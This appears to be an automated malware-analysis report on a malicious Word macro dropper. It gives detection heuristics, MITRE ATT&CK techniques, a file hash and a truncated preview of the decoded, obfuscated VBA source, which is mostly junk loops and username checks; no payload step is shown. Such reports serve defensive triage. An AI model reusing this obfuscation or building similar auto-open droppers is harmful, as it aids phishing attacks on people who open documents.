Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1047 WMI
The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6581624-0. High-severity heuristics indicate the presence of VBA macros, specifically an AutoOpen macro that calls CreateObject, which suggests it is designed to execute code when the document is opened. The VBA source itself appears obfuscated, but the combination of AutoOpen and CreateObject strongly implies dropper functionality.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6581624-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6581624-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 306082 bytes |

SHA-256: 679794100306e01171452f0e3d14b56355eea5f8ea8424e40d33569a9029c120

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "yV7Voz"
Public Function rF4VIYVZp(ByRef bAJk6CY7 As String, ByVal JenUYeAj5ed As String) As String
Dim wGwu3nHp() As Byte
If Application.UserName = "U9yQAyR426Z" Then
MsgBox ("e5OTQOO2KWq")
Else
Dim nLDLhtoJwBzjVb As String
nLDLhtoJwBzjVb = Application.UserName
End If
Dim Fe5SvGhohfk() As Byte
Dim YGv1jaR As String
For A8QeTyStt = 0 To 9
YGv1jaR = YGv1jaR + "U"
Next A8QeTyStt
For CbIRPqjdCJ = 0 To 9
HKeaFXZr = HKeaFXZr + CbIRPqjdCJ
Next CbIRPqjdCJ
Dim JJMVLBPC As Long
For SasRsF8i = 5 To 16
JJMVLBPC = JJMVLBPC + SasRsF8i
Next SasRsF8i
For JHBdli5x = 0 To 7
eGJ2Qtyn = eGJ2Qtyn + JHBdli5x
Next JHBdli5x
Dim Kbj2i8Ox As String
For GTbuekkL3 = 0 To 8
Kbj2i8Ox = Kbj2i8Ox + "C"
Next GTbuekkL3
Dim k9VcYU6J5 As Long
For Mrsi3Tmi = 7 To 12
k9VcYU6J5 = k9VcYU6J5 + Mrsi3Tmi
Next Mrsi3Tmi
Dim IBr7QMj As String
For aoafa3VB = 0 To 6
IBr7QMj = IBr7QMj + "p"
Next aoafa3VB
Dim rVKihlTwDEL As Long
For ug1dx3kXq = 0 To 6
iPv9dGV1 = iPv9dGV1 + ug1dx3kXq
Next ug1dx3kXq
Dim vYs6eu As String
For fpgbH3uJ = 0 To 6
vYs6eu = vYs6eu + "S"
Next fpgbH3uJ
Dim nyXFlC, PFj5Qv As Integer
nyXFlC = 7 + 8
For DIEX8Z0vi = 0 To 6
PFj5Qv = PFj5Qv + DIEX8Z0vi
Next DIEX8Z0vi
If PFj5Qv < DIEX8Z0vi Then
Dim tZ4zaDI As Long
End If
If Len(Application.UserName) < 537 Then
Dim AWs7St As Collection
End If
If Application.UserName = "PIjWkxiuV2E" Then
MsgBox ("xZhxpuK8Y0M")
Else
Dim Y7GelontWGstpu As String
Y7GelontWGstpu = Application.UserName
End If
Dim NaLIv0fcYt As Long
Dim v1O3haGj9e As String
For GLLqXe = 0 To 5
v1O3haGj9e = v1O3haGj9e + "v"
Next GLLqXe
Dim k1pNuRq39k As String
For KIV6dQfA = 0 To 9
k1pNuRq39k = k1pNuRq39k + "Z"
Next KIV6dQfA
Dim dOXhRKX851, mJWAhUcdU As Integer
dOXhRKX851 = 9 + 9
For Dr0BFv = 0 To 5
mJWAhUcdU = mJWAhUcdU + Dr0BFv
Next Dr0BFv
If mJWAhUcdU < Dr0BFv Then
Dim H0Wi3NG As Long
End If
Dim nEg8VEg, PUTakF As Integer
nEg8VEg = 9 + 7
For A6A9bC = 0 To 9
PUTakF = PUTakF + A6A9bC
Next A6A9bC
If PUTakF < A6A9bC Then
Dim vrVK3uqZE As Long
End If
Dim fDKQy9Jhx As Long
For q8hlWk = 9 To 14
fDKQy9Jhx = fDKQy9Jhx + q8hlWk
Next q8hlWk
For XpysBvmrG = 0 To 5
GybUCjcUS = GybUCjcUS + XpysBvmrG
Next XpysBvmrG
Dim q6Ch8KGu As String
For vUgBpQ6i = 0 To 7
q6Ch8KGu = q6Ch8KGu + "L"
Next vUgBpQ6i
If Len(Application.UserName) < 172 Then
Dim tf1gai9Ws As Collection
End If
If Len(Application.UserName) < 553 Then
Dim RAUORS As Collection
End If
Dim wTtFjEzzx0 As Long
Dim FlRBhiJG0, UD4EfMs As Integer
FlRBhiJG0 = 9 + 8
For wkv85bv = 0 To 8
UD4EfMs = UD4EfMs + wkv85bv
Next wkv85bv
If UD4EfMs < wkv85bv Then
Dim pbv8gHG As Long
End If
Dim MMmHWIE As Long
For LPAaHWyTz = 7 To 16
MMmHWIE = MMmHWIE + LPAaHWyTz
Next LPAaHWyTz
Dim CsAyjrIRH, YeHvnsz As Integer
CsAyjrIRH = 7 + 9
For Gy5CH1Ut = 0 To 7
YeHvnsz = YeHvnsz + Gy5CH1Ut
Next Gy5CH1Ut
If YeHvnsz < Gy5CH1Ut Then
Dim pFXFYtHM As Long
End If
Dim Gy6HRCY, atHtdhT As Integer
Gy6HRCY = 8 + 6
For LkmU0m = 0 To 5
atHtdhT = atHtdhT + LkmU0m
Next LkmU0m
If atHtdhT < LkmU0m Then
Dim WrMPYmP6iF As Long
End If
Dim tZZPvyq7Q As String
For HNJ7SWFC3 = 0 To 6
tZZPvyq7Q = tZZPvyq7Q + "G"
Next HNJ7SWFC3
For I2GspU = 0 To 9
dBvLS1naq = dBvLS1naq + I2GspU
Next I2GspU
For fZ8IOtP7M = 0 To 5
qGrhqF = qGrhqF + fZ8IOtP7M
Next fZ8IOtP7M
Dim pnnGQxv3Jh, XtwhsewJ As Integer
pnnGQxv3Jh = 5 + 7
For JwTJrt = 0 To 5
XtwhsewJ = XtwhsewJ + JwTJrt
Next JwTJrt
If XtwhsewJ < JwTJrt Then
Dim ycBiiiLk As Long
End If
If Application.UserName = "KVwXTdnXkBp" Then
MsgBox ("rMPMlkTI6ni")
Else
Dim PRBVJ0bnPWOnv4 As String
PRBVJ0bnPWOnv4 = Application.UserName
End If
If Len(Application.UserName) < 339 Then
Dim tCaj501Wf As Collection
End If
If Application.UserName = "HryrR7nShH0" Then
MsgBox ("SPcz
... (truncated)